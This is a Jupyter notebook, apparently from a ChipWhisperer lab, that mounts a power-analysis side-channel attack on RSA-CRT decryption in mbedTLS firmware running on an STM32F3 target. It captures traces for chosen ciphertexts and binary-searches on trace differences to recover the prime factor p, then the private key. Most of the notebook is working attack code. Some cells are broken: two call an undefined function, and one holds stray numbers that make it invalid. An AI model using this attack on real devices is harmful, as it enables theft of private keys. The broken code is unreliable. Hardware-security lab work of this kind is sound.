### Setup

In [ ]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CW308_STM32F3'
CRYPTO_TARGET = 'MBEDTLS'

In [ ]:
%%bash -s "$PLATFORM" "$CRYPTO_TARGET"
cd ../../../hardware/victims/firmware/simpleserial-rsa
#make clean PLATFORM=$1 CRYPTO_TARGET=$2
make PLATFORM=$1 CRYPTO_TARGET=$2 

In [ ]:
%run "../../Setup_Scripts/Setup_Generic.ipynb"

In [ ]:
fw_path = '../../../hardware/victims/firmware/simpleserial-rsa/simpleserial-rsa-CW308_STM32F3.hex'

In [ ]:
cw.program_target(scope, prog, fw_path)

In [ ]:
import numpy as np
import time 
import matplotlib.pylab as plt
import matplotlib

In [ ]:
e = 65537

In [ ]:
#2Bytes -> key_len = 4
n = 3849453107

p = 62549
q = 61543
dp = 11321
dq = 647
qinv = 34632

In [ ]:
#8Bytes -> key_len = 16
n = 89525655797379415138998373505682772229

In [ ]:
#16Bytes -> key_len = 32
n = 52270967183635299110959169812507925945033892524340745668343932985606720718177

In [ ]:
#key lenght of n; p, q have lenght key_len//2
key_len = 4

In [ ]:
#key lenght of n; p, q have lenght key_len//2
key_len = 32

### find numbers

In [ ]:
# Parameters
p = 14091828191315287507 
q = 6353019252147394247
    9223372036854775808
     288230376151711744
e = 65537
n = 89525655797379415138998373505682772229
max_msg = 10000  # Set a range for msg (you can adjust this range)

In [ ]:
def find_valid_msg_d1(p, q, e, n, max_msg):
    valid_msgs = []
    for msg in range(1, max_msg + 1):  # Iterate through possible msg values
        x = pow(msg, e, n)  # Compute (msg^e) % n efficiently using modular exponentiation
        if (x % p) - (x % q) < 0:  # Check the condition
            valid_msgs.append(msg)
    return valid_msgs



# Find and display valid messages
valid_msgs = find_valid_msgs(p, q, e, n, max_msg)
print(f"Valid messages: {valid_msgs}")

In [ ]:
def find_valid_msgs_d0(p, q, e, n, max_msg):
    valid_msgs = []
    for msg in range(1, max_msg + 1):  # Iterate through possible msg values
        x = pow(msg, e, n)  # Compute (msg^e) % n efficiently using modular exponentiation
        if (x % p) - (x % q) > 0:  # Check the condition
            valid_msgs.append(msg)
    return valid_msgs

# Find and display valid messages
valid_msgs = find_valid_msgs(p, q, e, n, max_msg)
print(f"Valid messages: {valid_msgs}")

### capture trace setup

In [ ]:
scope.clock.adc_src = "clkgen_x1"
scope.adc.samples = 600 #print('#samples: ', scope.adc.trig_count) gibt <600 samples aus 

#scope.adc.timeout = 50

In [ ]:
import time

def capture_RSA_trace(scope, target, text):
    scope.arm()
    target.simpleserial_write('t', text)

    # get debug output, nötig?
    #rec_str = target.read(1000, timeout=2000)
    #received_str = rec_str.replace("\\r\\n", "\n")
    #print(received_str)
    
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')

    time.sleep(2)
    output = target.read(timeout=20)
    print('first: ', output.replace("\\r\\n\\z00", "\n"))
    
    target.write("1\n")
    time.sleep(0.2)
    #output += target.read(timeout=10)
    output = target.read(timeout=10) 
    print('next 48 bytes: ', output.replace("r", "").replace("\nz00","").replace("\n",""))

    target.write("2\n")
    time.sleep(0.2)
    #output += target.read(timeout=10)
    output = target.read(timeout=10) 
    print('last bytes: ', output.replace("r", "").replace("\nz00","").replace("\n",""))


    #newout = output.replace("r", "").replace("\nz00","").replace("\n","")
    #print('output: ', newout)

    if SCOPETYPE == "OPENADC":
        print('#samples: ', scope.adc.trig_count)
    
    target.simpleserial_wait_ack() #!!!!
    return scope.get_last_trace()

In [ ]:
import time

def capture_RSA_trace(scope, target, text):
    target.flush()
    scope.arm()
    target.simpleserial_write('t', text)

    rec_str = target.read(1000, timeout=200)
    received_str = rec_str.replace("\\r\\n", "\n")
    print(received_str)
    
    ret = scope.capture()
    if ret:
        print('Timeout happened during acquisition')
    
    target.simpleserial_wait_ack() #!!!!
    return scope.get_last_trace()

### test numbers

In [ ]:
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 54
c = (msg ** e) % n

cb = c.to_bytes(key_len,'big')

print( 'encrypted: ', c, cb, type(cb), hex(c))

trace1 = capture_RSA_trace(scope, target, cb)
plt.figure()
plt.plot(trace1, 'r')

In [ ]:
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 16
c = (msg ** e) % n

cb = c.to_bytes(key_len,'big')

print( 'encrypted: ', c, cb, type(cb), hex(c))

trace2 = capture_RSA_trace(scope, target, cb)
plt.figure()
plt.plot(trace2, 'r')

In [ ]:
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 11
c = (msg ** e) % n

cb = c.to_bytes(key_len,'big')

print( 'encrypted: ', c, cb, type(cb), hex(c))

trace3 = capture_RSA_trace(scope, target, cb)
plt.figure()
plt.plot(trace3, 'r')


In [ ]:
%matplotlib ipympl
import matplotlib.pylab as plt

msg = 62549 
c = (msg ** e) % n

cb = c.to_bytes(key_len,'big')

print( 'encrypted: ', c, cb, type(cb), hex(c))

trace4 = capture_RSA_trace(scope, target, cb)
plt.figure()
plt.plot(trace4, 'r')

In [ ]:
print(np.sum(np.abs(trace1 - trace2))) #same
print(np.sum(np.abs(trace1 - trace3))) #diff
print(np.sum(np.abs(trace1 - trace4))) #diff
print(np.sum(np.abs(trace2 - trace3))) #diff
print(np.sum(np.abs(trace2 - trace4))) #diff
print(np.sum(np.abs(trace3 - trace4))) #same 

In [ ]:
plt.figure()
plt.plot(trace1, 'r')
plt.plot(trace2, 'b')
plt.plot(trace2, 'y')
plt.plot(trace4, 'g')

In [ ]:
# keylen = 4
# #samples für MBEDTLS_MPI_CHK( mbedtls_mpi_sub_mpi( &T, &T1, &T2 ) ) = 600
# diff(same): 2 
# diff(diff): 30

### Key Reconstuction

* find plaintexts x_1 and x_2 mit diff(x_1) = 0 und diff(x_2) = 1.
* mittels binäre suche: finde x mit diff(x-1) = 0 und diff(x) = 1 -> x ist Vielfaches von p 
* ggt(x, n) = p
* x^e mod n

### Algorithmus

Reconstruction of p when its bitlength is half bitlength of n
INPUT: modulus n with the bitlength t, public exponent e.
OUTPUT: prime p such that p divides n.

t = bitlenght von n 
p,q haben bitlänge t/2

x = 2 ** (t/2)
m = x/2 

In [ ]:
#  Byte Primzahlen 

t = key_len*8

# x= 2 ** (t/2) 
# m = x/2 
# l = 0 

#upper
x = 2**(t//2)
m = x//2
#lower
l = 0

print(x, m, l)

In [ ]:
plt.figure()

ref_trace_msg_ = 11 
c_ = (ref_trace_msg_ ** e) % n 
msg_ = c_.to_bytes(key_len,'big')
trace_ = capture_RSA_trace(scope, target, msg_)
plt.plot(trace_, 'r')


while m != l:
    print(m, hex(m), '\n')
    enc = pow(m, e, n)
    msg = enc.to_bytes(key_len,'big')
    
    trace = capture_RSA_trace(scope, target, msg)

    diff = np.sum(np.abs(trace - trace_))
    print(m, hex(enc), diff)
    
    if diff < 15: # ähnliche -> diff(m) = 0
        plt.plot(trace, 'g')
        l = m
    else: #unterscheidet sich von ref_trace -> diff(m) = 1
        plt.plot(trace, 'b')
        x = m
        
    m = (l + x)//2
    
    

print (x)


p = 14091828191315287507
q = 6353019252147394247
N = 89525655797379415138998373505682772229

q = N // p
euler = (p-1)*(q-1)

-> d durch erweiterter euklidischer algo 

In [ ]:
scope.dis()
target.dis()